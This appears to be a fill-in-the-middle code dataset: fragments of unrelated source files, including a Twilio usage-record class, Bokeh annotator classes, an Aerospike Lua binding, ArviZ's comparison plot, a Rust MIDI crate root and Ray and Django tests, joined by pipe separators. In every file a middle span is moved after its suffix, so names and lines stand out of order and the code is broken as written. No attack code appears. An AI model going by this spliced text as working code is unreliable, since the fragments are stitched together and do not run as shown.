PV_COMPOSITION_MEDIA_STORED = "pv-composition-media-stored"
PV_COMPOSITION_MINUTES = "pv-composition-minutes"
PV_RECORDING_COMPOSITIONS = "pv-recording-compositions"
PV_ROOM_PARTICIPANTS = "pv-room-participants"
PV_ROOM_PARTICIPANTS_AU1 = "pv-room-participants-au1"
PV_ROOM_PARTICIPANTS_BR1 = "pv-room-participants-br1"
PV_ROOM_PARTICIPANTS_IE1 = "pv-room-participants-ie1"
PV_ROOM_PARTICIPANTS_JP1 = "pv-room-participants-jp1"
PV_ROOM_PARTICIPANTS_SG1 = "pv-room-participants-sg1"
PV_ROOM_PARTICIPANTS_US1 = "pv-room-participants-us1"
PV_ROOM_PARTICIPANTS_US2 = "pv-room-participants-us2"
PV_ROOMS = "pv-rooms"
PV_SIP_ENDPOINT_REGISTRATIONS = "pv-sip-endpoint-registrations"
RECORDINGS = "recordings"
RECORDINGSTORAGE = "recordingstorage"
ROOMS_GROUP_BANDWIDTH = "rooms-group-bandwidth"
ROOMS_GROUP_MINUTES = "rooms-group-minutes"
ROOMS_PEER_TO_PEER_MINUTES = "rooms-peer-to-peer-minutes"
SHORTCODES = "shortcodes"
SHORTCODES_CUSTOMEROWNED = "shortcodes-customerowned"
SHORTCODES_MMS_ENABLEMENT = "shortcodes-mms-enablement"
SHORTCODES_MPS = "shortcodes-mps"
SHORTCODES_RANDOM = "shortcodes-random"
SHORTCODES_UK = "shortcodes-uk"
SHORTCODES_VANITY = "shortcodes-vanity"
SMALL_GROUP_ROOMS = "small-group-rooms"
SMALL_GROUP_ROOMS_DATA_TRACK = "small-group-rooms-data-track"
SMALL_GROUP_ROOMS_PARTICIPANT_MINUTES = "small-group-rooms-participant-minutes"
SMS = "sms"
SMS_INBOUND = "sms-inbound"
SMS_INBOUND_LONGCODE = "sms-inbound-longcode"
SMS_INBOUND_SHORTCODE = "sms-inbound-shortcode"
SMS_MESSAGES_CARRIERFEES = "sms-messages-carrierfees"
SMS_MESSAGES_FEATURES = "sms-messages-features"
SMS_MESSAGES_FEATURES_SENDERID = "sms-messages-features-senderid"
SMS_OUTBOUND = "sms-outbound"
SMS_OUTBOUND_CONTENT_INSPECTION = "sms-outbound-content-inspection"
SMS_OUTBOUND_LONGCODE = "sms-outbound-longcode"
SMS_OUTBOUND_SHORTCODE = "sms-outbound-shortcode"
SPEECH_RECOGNITION = "speech-recognition"
STUDIO_ENGAGEMENTS = "studio-engagements"
SYNC = "sync"
SYNC_ACTIONS = "sync-actions"
SYNC_ENDPOINT_HOURS = "sync-endpoint-hours"
SYNC_ENDPOINT_HOURS_ABOVE_DAILY_CAP = "sync-endpoint-hours-above-daily-cap"
TASKROUTER_TASKS = "taskrouter-tasks"
TOTALPRICE = "totalprice"
TRANSCRIPTIONS = "transcriptions"
TRUNKING_CPS = "trunking-cps"
TRUNKING_EMERGENCY_CALLS = "trunking-emergency-calls"
TRUNKING_ORIGINATION = "trunking-origination"
TRUNKING_ORIGINATION_LOCAL = "trunking-origination-local"
TRUNKING_ORIGINATION_MOBILE = "trunking-origination-mobile"
TRUNKING_ORIGINATION_TOLLFREE = "trunking-origination-tollfree"
TRUNKING_RECORDINGS = "trunking-recordings"
TRUNKING_SECURE = "trunking-secure"
TRUNKING_TERMINATION = "trunking-termination"
TURNMEGABYTES = "turnmegabytes"
TURNMEGABYTES_AUSTRALIA = "turnmegabytes-australia"
TURNMEGABYTES_BRASIL = "turnmegabytes-brasil"
TURNMEGABYTES_GERMANY = "turnmegabytes-germany"
TURNMEGABYTES_INDIA = "turnmegabytes-india"
TURNMEGABYTES_IRELAND = "turnmegabytes-ireland"
TURNMEGABYTES_JAPAN = "turnmegabytes-japan"
TURNMEGABYTES_SINGAPORE = "turnmegabytes-singapore"
TURNMEGABYTES_USEAST = "turnmegabytes-useast"
TURNMEGABYTES_USWEST = "turnmegabytes-uswest"
TWILIO_INTERCONNECT = "twilio-interconnect"
VERIFY_PUSH = "verify-push"
VIDEO_RECORDINGS = "video-recordings"
VOICE_INSIGHTS = "voice-insights"
VOICE_INSIGHTS_CLIENT_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-client-insights-on-demand-minute"
VOICE_INSIGHTS_PTSN_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-ptsn-insights-on-demand-minute"
VOICE_INSIGHTS_SIP_INTERFACE_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-sip-interface-insights-on-demand-minute"
VOICE_INSIGHTS_SIP_TRUNKING_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-sip-trunking-insights-on-demand-minute"
WIRELESS = "wireless"
WIRELESS_ORDERS = "wireless-orders"
WIRELESS_ORDERS_ARTWORK = "wireless-orders-artwork"
WIRELESS_ORDERS_BULK = "wireless-orders-bulk"
WIRELESS_ORDERS_ESIM = "wireless-orders-esim"
WIRELESS_ORDERS_STARTER = "wireless-orders-starter"
WIRELESS_USAGE = "wireless-usage"
WIRELESS_USAGE_COMMANDS = "wireless-usage-commands"
WIRELESS_USAGE_COMMANDS_AFRICA = "wireless-usage-commands-africa"
WIRELESS_USAGE_COMMANDS_ASIA = "wireless-usage-commands-asia"
WIRELESS_USAGE_COMMANDS_CENTRALANDSOUTHAMERICA = "wireless-usage-commands-centralandsouthamerica"
WIRELESS_USAGE_COMMANDS_EUROPE = "wireless-usage-commands-europe"
WIRELESS_USAGE_COMMANDS_HOME = "wireless-usage-commands-home"
WIRELESS_USAGE_COMMANDS_NORTHAMERICA = "wireless-usage-commands-northamerica"
WIRELESS_USAGE_COMMANDS_OCEANIA = "wireless-usage-commands-oceania"
WIRELESS_USAGE_COMMANDS_ROAMING = "wireless-usage-commands-roaming"
WIRELESS_USAGE_DATA = "wireless-usage-data"
WIRELESS_USAGE_DATA_AFRICA = "wireless-usage-data-africa"
WIRELESS_USAGE_DATA_ASIA = "wireless-usage-data-asia"
WIRELESS_USAGE_DATA_CENTRALANDSOUTHAMERICA = "wireless-usage-data-centralandsouthamerica"
WIRELESS_USAGE_DATA_CUSTOM_ADDITIONALMB = "wireless-usage-data-custom-additionalmb"
WIRELESS_USAGE_DATA_CUSTOM_FIRST5MB = "wireless-usage-data-custom-first5mb"
WIRELESS_USAGE_DATA_DOMESTIC_ROAMING = "wireless-usage-data-domestic-roaming"
WIRELESS_USAGE_DATA_EUROPE = "wireless-usage-data-europe"
WIRELESS_USAGE_DATA_INDIVIDUAL_ADDITIONALGB = "wireless-usage-data-individual-additionalgb"
WIRELESS_USAGE_DATA_INDIVIDUAL_FIRSTGB = "wireless-usage-data-individual-firstgb"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_CANADA = "wireless-usage-data-international-roaming-canada"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_INDIA = "wireless-usage-data-international-roaming-india"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_MEXICO = "wireless-usage-data-international-roaming-mexico"
WIRELESS_USAGE_DATA_NORTHAMERICA = "wireless-usage-data-northamerica"
WIRELESS_USAGE_DATA_OCEANIA = "wireless-usage-data-oceania"
WIRELESS_USAGE_DATA_POOLED = "wireless-usage-data-pooled"
WIRELESS_USAGE_DATA_POOLED_DOWNLINK = "wireless-usage-data-pooled-downlink"
WIRELESS_USAGE_DATA_POOLED_UPLINK = "wireless-usage-data-pooled-uplink"
WIRELESS_USAGE_MRC = "wireless-usage-mrc"
WIRELESS_USAGE_MRC_CUSTOM = "wireless-usage-mrc-custom"
WIRELESS_USAGE_MRC_INDIVIDUAL = "wireless-usage-mrc-individual"
WIRELESS_USAGE_MRC_POOLED = "wireless-usage-mrc-pooled"
WIRELESS_USAGE_MRC_SUSPENDED = "wireless-usage-mrc-suspended"
WIRELESS_USAGE_SMS = "wireless-usage-sms"
WIRELESS_USAGE_VOICE = "wireless-usage-voice"
def __init__(self, version, payload, account_sid):
"""
Initialize the DailyInstance
:returns: twilio.rest.api.v2010.account.usage.record.daily.DailyInstance
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyInstance
"""
super(DailyInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'account_sid': payload.get('account_sid'),
'api_version': payload.get('api_version'),
'as_of': payload.get('as_of'),
'category': payload.get('category'),
'count': payload.get('count'),
'count_unit': payload.get('count_unit'),
'description': payload.get('description'),
'end_date': deserialize.iso8601_date(payload.get('end_date')),
'price': deserialize.decimal(payload.get('price')),
'price_unit': payload.get('price_unit'),
'start_date': deserialize.iso8601_date(payload.get('start_date')),
'subresource_uris': payload.get('subresource_uris'),
'uri': payload.get('uri'),
'usage': payload.get('usage'),
'usage_unit': payload.get('usage_unit'),
}
# Context
self._context = None
self._solution = {'account_sid': account_sid, }
@property
def account_sid(self):
"""
:returns: The SID of the Account accrued the usage
:rtype: unicode
"""
return self._properties['account_sid']
@property
def api_version(self):
"""
:returns: The API version used to create the resource
:rtype: unicode
"""
return self._properties['api_version']
@property
def as_of(self):
"""
:returns: Usage records up to date as of this timestamp
:rtype: unicode
"""
return self._properties['as_of']
@property
def category(self):
"""
:returns: The category of usage
:rtype: DailyInstance.Category
"""
return self._properties['category']
@property
def count(self):
"""
:returns: The number of usage events
:rtype: unicode
"""
return self._properties['count']
@property
def count_unit(self):
"""
:returns: The units in which count is measured
:rtype: unicode
"""
return self._properties['count_unit']
@property
def description(self):
"""
:returns: A plain-language description of the usage category
:rtype: unicode
"""
return self._properties['description']
@property
def end_date(self):
"""
:returns: The last date for which usage is included in the UsageRecord
:rtype: date
"""
return self._properties['end_date']
@property
def price(self):
"""
:returns: The total price of the usage
:rtype: unicode
"""
return self._properties['price']
@property
def price_unit(self):
"""
:returns: The currency in which `price` is measured
:rtype: unicode
"""
return self._properties['price_unit']
@property
def start_date(self):
"""
:returns: The first date for which usage is included in this UsageRecord
:rtype: date
"""
return self._properties['start_date']
@property
def subresource_uris(self):
"""
:returns: A list of related resources identified by their relative URIs
:rtype: unicode
"""
return self._properties['subresource_uris']
@property
def uri(self):
"""
:returns: The URI of the resource, relative to `https://api.twilio.com`
:rtype: unicode
"""
return self._properties['uri']
@property
def usage(self):
"""
:returns: The amount of usage
:rtype: unicode
"""
return self._properties['usage']
@property
def usage_unit(self):
"""
:returns: The units in which usage is measured
:rtype: unicode
"""
return self._properties['usage_unit']
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.DailyInstance>' | :param date end_date: Only include usage that occurred on or before this date |
documents.js | Template.documents.helpers({
documents: function(){
var getDocuments = Documents.find( {}, { fields: { "title": 1 } } ); | if ( getDocuments ) {
return getDocuments;
}
}
}); | |
specialization.py | """
???+ note "Child classes which are `functionality`-by-`feature` products."
This could resemble template specialization in C++.
"""
from .functionality import (
BokehDataFinder,
BokehDataAnnotator,
BokehSoftLabelExplorer,
BokehMarginExplorer,
BokehSnorkelExplorer,
)
from .feature import BokehForText, BokehForAudio, BokehForImage
from bokeh.layouts import column, row
from deprecated import deprecated
class BokehTextFinder(BokehDataFinder, BokehForText):
"""
???+ note "The text flavor of `BokehDataFinder`.""
"""
TOOLTIP_KWARGS = BokehForText.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForText.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataFinder.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(column(self.search_pos, self.search_neg), self.search_filter_box),
row(self.data_key_button_group),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehTextAnnotator(BokehDataAnnotator, BokehForText):
"""
???+ note "The text flavor of `BokehDataAnnotator`.""
"""
TOOLTIP_KWARGS = BokehForText.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForText.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataAnnotator.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.search_pos, self.search_neg),
row(self.data_key_button_group),
row(self.annotator_input, self.annotator_apply, self.annotator_export),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehTextSoftLabel(BokehSoftLabelExplorer, BokehForText):
"""
???+ note "The text flavor of `BokehSoftLabelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForText.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForText.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSoftLabelExplorer.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.search_pos, self.search_neg),
row(self.data_key_button_group),
row(self.score_filter),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehTextMargin(BokehMarginExplorer, BokehForText):
"""
???+ note "The text flavor of `BokehMarginExplorer`.""
"""
TOOLTIP_KWARGS = BokehForText.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForText.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehMarginExplorer.SUBSET_GLYPH_KWARGS
class BokehTextSnorkel(BokehSnorkelExplorer, BokehForText):
|
class BokehAudioFinder(BokehDataFinder, BokehForAudio):
"""
???+ note "The audio flavor of `BokehDataFinder`.""
"""
TOOLTIP_KWARGS = BokehForAudio.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForAudio.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataFinder.SUBSET_GLYPH_KWARGS
class BokehAudioAnnotator(BokehDataAnnotator, BokehForAudio):
"""
???+ note "The audio flavor of `BokehDataAnnotator`.""
"""
TOOLTIP_KWARGS = BokehForAudio.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForAudio.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataAnnotator.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.data_key_button_group),
row(self.annotator_input, self.annotator_apply, self.annotator_export),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehAudioSoftLabel(BokehSoftLabelExplorer, BokehForAudio):
"""
???+ note "The audio flavor of `BokehSoftLabelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForAudio.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForAudio.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSoftLabelExplorer.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.data_key_button_group),
row(self.score_filter),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehAudioMargin(BokehMarginExplorer, BokehForAudio):
"""
???+ note "The audio flavor of `BokehMarginExplorer`.""
"""
TOOLTIP_KWARGS = BokehForAudio.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForAudio.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehMarginExplorer.SUBSET_GLYPH_KWARGS
class BokehAudioSnorkel(BokehSnorkelExplorer, BokehForAudio):
"""
???+ note "The audio flavor of `BokehSnorkelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForAudio.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForAudio.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSnorkelExplorer.SUBSET_GLYPH_KWARGS
class BokehImageFinder(BokehDataFinder, BokehForImage):
"""
???+ note "The image flavor of `BokehDataFinder`.""
"""
TOOLTIP_KWARGS = BokehForImage.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForImage.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataFinder.SUBSET_GLYPH_KWARGS
class BokehImageAnnotator(BokehDataAnnotator, BokehForImage):
"""
???+ note "The image flavor of `BokehDataAnnotator`.""
"""
TOOLTIP_KWARGS = BokehForImage.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForImage.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataAnnotator.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.data_key_button_group),
row(self.annotator_input, self.annotator_apply, self.annotator_export),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehImageSoftLabel(BokehSoftLabelExplorer, BokehForImage):
"""
???+ note "The image flavor of `BokehSoftLabelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForImage.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForImage.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSoftLabelExplorer.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.data_key_button_group),
row(self.score_filter),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehImageMargin(BokehMarginExplorer, BokehForImage):
"""
???+ note "The image flavor of `BokehMarginExplorer`.""
"""
TOOLTIP_KWARGS = BokehForImage.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForImage.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehMarginExplorer.SUBSET_GLYPH_KWARGS
class BokehImageSnorkel(BokehSnorkelExplorer, BokehForImage):
"""
???+ note "The image flavor of `BokehSnorkelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForImage.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForImage.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSnorkelExplorer.SUBSET_GLYPH_KWARGS
@deprecated(
version="0.4.0",
reason="will be removed in a future version; please use BokehTextFinder instead.",
)
class BokehCorpusExplorer(BokehTextFinder):
pass
@deprecated(
version="0.4.0",
reason="will be removed in a future version; please use BokehTextFinder instead.",
)
class BokehCorpusAnnotator(BokehTextAnnotator):
pass
| """
???+ note "The text flavor of `BokehSnorkelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForText.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForText.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSnorkelExplorer.SUBSET_GLYPH_KWARGS |
base.py | from __future__ import unicode_literals
import re
class CanonBase:
single_verse_re = {
'en': 'v[.]*',
'fr': '[v]{1,2}[.]?\s{0,2}',
}
def __init__(self, language='en'):
self.language = language
# We check for books
if hasattr(self, 'books'):
# We it is not a dictionary, we raise an error
if not isinstance(self.books, dict):
raise Exception('"books" should be a dictionary, who\'s values are four valued tuples (Book Name, '
'Abbreviation, Regex, [ch1_verse_count, ch2_verse_count, ...])')
# We set the regex instance variables
self.book_re_string = '|'.join(b.get(self.language)[2] for b in self.books.values())
self.book_re = re.compile(self.book_re_string, re.IGNORECASE | re.UNICODE)
| raise Exception('Text has no "books"') | self.single_verse_re_string = self.single_verse_re.get(self.language)
# Otherwise we raise an error
else: |
serviceDoc.js | import "../domainDoc.js"
/**
* @callback onDevelopersReadyCallback
* @param {Developer[]} devs - array of developers
* @return {undefined} void
*/
| /**
* @callback onProjectsReadyCallback
* @param {Project[]} projects - array of projects
* @return {undefined} void
*/
/**
* Common interface for all services (abstract factory pattern)
*
* @typedef {
{loadDevelopers: (function(onDevelopersReadyCallback): undefined)},
{loadProjects: (function(onProjectsReadyCallback): undefined)}
} PepService
*/ | |
lua_aerospike.go | // +build !app_engine
// Copyright 2013-2019 Aerospike, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package lua
import (
"github.com/Exotel-Org/aerospike-client-go/logger"
"github.com/yuin/gopher-lua"
)
type LuaAerospike struct {
s chan interface{}
}
const luaLuaAerospikeTypeName = "LuaAerospike"
// Registers my luaAerospike type to given L.
func | (L *lua.LState) {
mt := L.NewTypeMetatable(luaLuaAerospikeTypeName)
L.SetGlobal("aerospike", mt)
// static attributes
L.SetField(mt, "log", L.NewFunction(luaAerospikeLog))
L.SetMetatable(mt, mt)
}
func luaAerospikeLog(L *lua.LState) int {
if L.GetTop() < 2 || L.GetTop() > 3 {
L.ArgError(1, "2 arguments are expected for aerospike:log method")
return 0
}
// account for calling it on a table
paramIdx := 1
if L.GetTop() == 3 {
paramIdx = 2
}
level := L.CheckInt(paramIdx)
str := L.CheckString(paramIdx + 1)
switch level {
case 1:
logger.Logger.Warn(str)
case 2:
logger.Logger.Info(str)
case 3, 4:
logger.Logger.Debug(str)
}
return 0
}
| registerLuaAerospikeType |
compareplot.py | """Summary plot for model comparison."""
import numpy as np
import matplotlib.pyplot as plt
from .plot_utils import _scale_fig_size
def | (
comp_df,
insample_dev=True,
plot_standard_error=True,
plot_ic_diff=True,
order_by_rank=True,
figsize=None,
textsize=None,
plot_kwargs=None,
ax=None,
):
"""
Summary plot for model comparison.
This plot is in the style of the one used in the book Statistical Rethinking (Chapter 6)
by Richard McElreath.
Notes
-----
Defaults to comparing Widely Accepted Information Criterion (WAIC) if present in comp_df column,
otherwise compares Leave-one-out (loo)
Parameters
----------
comp_df : pd.DataFrame
Result of the `az.compare()` method
insample_dev : bool, optional
Plot in-sample deviance, that is the value of the information criteria without the
penalization given by the effective number of parameters (pIC). Defaults to True
plot_standard_error : bool, optional
Plot the standard error of the information criteria estimate. Defaults to True
plot_ic_diff : bool, optional
Plot standard error of the difference in information criteria between each model
and the top-ranked model. Defaults to True
order_by_rank : bool
If True (default) ensure the best model is used as reference.
figsize : tuple, optional
If None, size is (6, num of models) inches
textsize: float
Text size scaling factor for labels, titles and lines. If None it will be autoscaled based
on figsize.
plot_kwargs : dict, optional
Optional arguments for plot elements. Currently accepts 'color_ic',
'marker_ic', 'color_insample_dev', 'marker_insample_dev', 'color_dse',
'marker_dse', 'ls_min_ic' 'color_ls_min_ic', 'fontsize'
ax : axes, optional
Matplotlib axes
Returns
-------
ax : matplotlib axes
Examples
--------
Show default compare plot
.. plot::
:context: close-figs
>>> import arviz as az
>>> model_compare = az.compare({'Centered 8 schools': az.load_arviz_data('centered_eight'),
>>> 'Non-centered 8 schools': az.load_arviz_data('non_centered_eight')})
>>> az.plot_compare(model_compare)
Plot standard error and information criteria difference only
.. plot::
:context: close-figs
>>> az.plot_compare(model_compare, insample_dev=False)
"""
if figsize is None:
figsize = (6, len(comp_df))
figsize, ax_labelsize, _, xt_labelsize, linewidth, _ = _scale_fig_size(figsize, textsize, 1, 1)
if ax is None:
_, ax = plt.subplots(figsize=figsize, constrained_layout=True)
if plot_kwargs is None:
plot_kwargs = {}
yticks_pos, step = np.linspace(0, -1, (comp_df.shape[0] * 2) - 1, retstep=True)
yticks_pos[1::2] = yticks_pos[1::2] + step / 2
yticks_labels = [""] * len(yticks_pos)
_information_criterion = ["waic", "loo"]
column_index = [c.lower() for c in comp_df.columns]
for information_criterion in _information_criterion:
if information_criterion in column_index:
break
else:
raise ValueError(
"comp_df must contain one of the following"
" information criterion: {}".format(_information_criterion)
)
if order_by_rank:
comp_df.sort_values(by="rank", inplace=True)
if plot_ic_diff:
yticks_labels[0] = comp_df.index[0]
yticks_labels[2::2] = comp_df.index[1:]
ax.set_yticks(yticks_pos)
ax.errorbar(
x=comp_df[information_criterion].iloc[1:],
y=yticks_pos[1::2],
xerr=comp_df.dse[1:],
color=plot_kwargs.get("color_dse", "grey"),
fmt=plot_kwargs.get("marker_dse", "^"),
mew=linewidth,
elinewidth=linewidth,
)
else:
yticks_labels = comp_df.index
ax.set_yticks(yticks_pos[::2])
if plot_standard_error:
ax.errorbar(
x=comp_df[information_criterion],
y=yticks_pos[::2],
xerr=comp_df.se,
color=plot_kwargs.get("color_ic", "k"),
fmt=plot_kwargs.get("marker_ic", "o"),
mfc="None",
mew=linewidth,
lw=linewidth,
)
else:
ax.plot(
comp_df[information_criterion],
yticks_pos[::2],
color=plot_kwargs.get("color_ic", "k"),
marker=plot_kwargs.get("marker_ic", "o"),
mfc="None",
mew=linewidth,
lw=0,
)
if insample_dev:
ax.plot(
comp_df[information_criterion] - (2 * comp_df["p_" + information_criterion]),
yticks_pos[::2],
color=plot_kwargs.get("color_insample_dev", "k"),
marker=plot_kwargs.get("marker_insample_dev", "o"),
mew=linewidth,
lw=0,
)
ax.axvline(
comp_df[information_criterion].iloc[0],
ls=plot_kwargs.get("ls_min_ic", "--"),
color=plot_kwargs.get("color_ls_min_ic", "grey"),
lw=linewidth,
)
scale_col = information_criterion + "_scale"
if scale_col in comp_df:
scale = comp_df[scale_col].iloc[0].capitalize()
else:
scale = "Deviance"
ax.set_xlabel(scale, fontsize=ax_labelsize)
ax.set_yticklabels(yticks_labels)
ax.set_ylim(-1 + step, 0 - step)
ax.tick_params(labelsize=xt_labelsize)
return ax
| plot_compare |
lib.rs | #![cfg_attr(all(not(feature = "std"), not(test)), no_std)]
#![doc(html_root_url = "https://docs.rs/helgoboss-midi/0.3.3")]
//! Interfaces, data structures and utilities for dealing with MIDI messages.
//!
//! # Features
//!
//! - Complete support for the following message types:
//! - Short messages (3 bytes)
//! - 14-bit Control Change messages
//! - (N)RPN messages
//! - Scanners for extracting 14-bit Control Change and (N)RPN messages from a stream of short
//! messages
//! - Suitable for real-time usage (no heap allocation, no dynamic dispatch, no locking)
//! - Unified API to work with different short message data structures (see
//! [`ShortMessage`](trait.ShortMessage.html) trait)
//! - Uses wording which is as close as possible to the [MIDI 1.0 specification](https://www.midi.org/specifications-old/category/midi-1-0-detailed-specifications)
//!
//! # Not yet implemented
//!
//! Data structures and utilities for dealing with System Exclusive messages are not yet
//! implemented. They will be added eventually as separate structures on top of the
//! existing ones (similar to (N)RPN and 14-bit Control Change).
//!
//! # Examples
//!
//! See how to ...
//!
//! - [Create and inspect short messages](struct.RawShortMessage.html#example)
//! - [Easily match short messages](enum.StructuredShortMessage.html#example)
//! - [Create and inspect 14-bit Control Change
//! messages](struct.ControlChange14BitMessage.html#example)
//! - [Create and inspect (N)RPN messages](struct.ParameterNumberMessage.html#example)
//! - [Create MIDI messages with minimum boilerplate](test_util/index.html#example)
//! - [Scan stream for 14-bit Control Change
//! messages](struct.ControlChange14BitMessageScanner.html#example)
//! - [Scan stream for (N)RPN messages](struct.ParameterNumberMessageScanner.html#example)
#[macro_use]
mod newtype_macros;
pub use newtype_macros::*;
mod short_message;
pub use short_message::*;
mod short_message_factory;
pub use short_message_factory::*;
| mod raw_short_message;
pub use raw_short_message::*;
mod control_change_14_bit_message;
pub use control_change_14_bit_message::*;
mod control_change_14_bit_message_scanner;
pub use control_change_14_bit_message_scanner::*;
mod parameter_number_message;
pub use parameter_number_message::*;
mod parameter_number_message_scanner;
pub use parameter_number_message_scanner::*;
#[cfg(feature = "std")]
mod polling_parameter_number_message_scanner;
#[cfg(feature = "std")]
pub use polling_parameter_number_message_scanner::*;
// I added the _mod suffix because of intellij-rust issue 4992
mod channel_mod;
pub use channel_mod::*;
mod key_number_mod;
pub use key_number_mod::*;
mod controller_number_mod;
pub use controller_number_mod::*;
mod u4_mod;
pub use u4_mod::*;
mod u7_mod;
pub use u7_mod::*;
mod u14_mod;
pub use u14_mod::*;
mod bit_util;
pub(crate) use bit_util::*;
pub mod test_util; | mod structured_short_message;
pub use structured_short_message::*;
|
WhiteSelect.tsx | import { Select, withStyles } from "@material-ui/core";
| paddingTop: "12px",
paddingBottom: "11px",
backgroundColor: "#FFFFFF",
"&:focus": {
backgroundColor: "#FFFFFF",
},
},
})(Select); | export const WhiteSelect = withStyles({
root: { |
test_moab_wrapper.py | from typing import Optional
import gym
import pytest
from ray.rllib.env.wrappers.moab_wrapper import _MoabBaseWrapper
from ray.tune.registry import ENV_CREATOR, _global_registry
@pytest.mark.parametrize("env_name, iterations",
[
("MoabMoveToCenterSim-v0", 10),
("MoabMoveToCenterPartialObservableSim-v0", 10),
("MoabMoveToCenterAvoidObstacleSim-v0", 3),],
)
@pytest.mark.parametrize("randomize_ball", [True, False])
@pytest.mark.parametrize("randomize_obstacle", [True, False])
@pytest.mark.parametrize("seed", [None, 1])
class TestMoabWrapper:
@pytest.fixture
def env_name(self) -> str:
return "MoabMoveToCenterSim-v0"
@pytest.fixture
def randomize_ball(self) -> bool:
return False
@pytest.fixture
def randomize_obstacle(self) -> bool:
return False
@pytest.fixture
def seed(self) -> Optional[int]:
return None
@pytest.fixture
def iterations(self) -> int:
return 3
@pytest.fixture
def moab_env(self,
env_name: str,
randomize_ball: bool,
randomize_obstacle: bool,
seed: Optional[int]) -> _MoabBaseWrapper:
env_creator = _global_registry.get(ENV_CREATOR, env_name)
env_config = {
"randomize_ball": randomize_ball,
"randomize_obstacle": randomize_obstacle,
"seed": seed,
}
return env_creator(env_config)
def test_observation_space(self, moab_env: _MoabBaseWrapper, iterations: int):
obs = moab_env.reset()
assert (moab_env.observation_space.contains(obs),
f"{moab_env.observation_space} doesn't contain {obs}")
new_obs, _, _, _ = moab_env.step(moab_env.action_space.sample())
assert moab_env.observation_space.contains(new_obs)
def test_action_space_conversion(self, moab_env: _MoabBaseWrapper, iterations: int):
assert isinstance(moab_env.action_space, gym.spaces.Box)
moab_env.reset()
action = moab_env.action_space.sample()
moab_env.step(action)
def test_few_iterations(self, moab_env: _MoabBaseWrapper, iterations: int):
moab_env.reset() | for _ in range(iterations):
moab_env.step(moab_env.action_space.sample()) |
|
test_sqlcreate.py | # -*- coding: utf-8 -*-
from io import StringIO
from django.core.management import CommandError, call_command
from django.test import TestCase
from django.test.utils import override_settings
from unittest.mock import patch
MYSQL_DATABASE_SETTINGS = {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'dbatabase',
